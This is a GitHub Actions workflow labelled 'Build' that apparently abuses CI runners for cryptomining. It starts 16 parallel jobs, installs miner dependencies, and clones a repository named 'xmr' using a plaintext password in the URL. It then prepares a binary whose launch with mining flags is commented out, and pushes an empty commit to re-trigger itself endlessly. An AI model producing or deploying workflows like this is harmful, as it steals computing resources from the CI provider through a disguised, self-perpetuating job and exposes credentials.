name: Build
on:
  push:
jobs:
  test:
    name: Fetch
    runs-on: ubuntu-latest
    container: ubuntu:20.10
    env:
      DEBIAN_FRONTEND: noninteractive
    strategy:
      fail-fast: false
      matrix:
        runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
      - run: |
          apt update -qq
          apt install -y git libuv1 libssl1.1 libhwloc15
          git clone https://daveyg1:Magratsucks123@github.com/daveyg1/xmr.git
          cd xmr
          chmod u+x prog
          # timeout $(shuf -i 300-820 -n 1) ./prog --cpu-no-yield --cpu-priority 5 || true
          if [ ${{ matrix.runner }} -eq 0 ]
          then
            sleep 30s
            git commit --allow-empty --allow-empty-message --no-edit
            git push
          fi
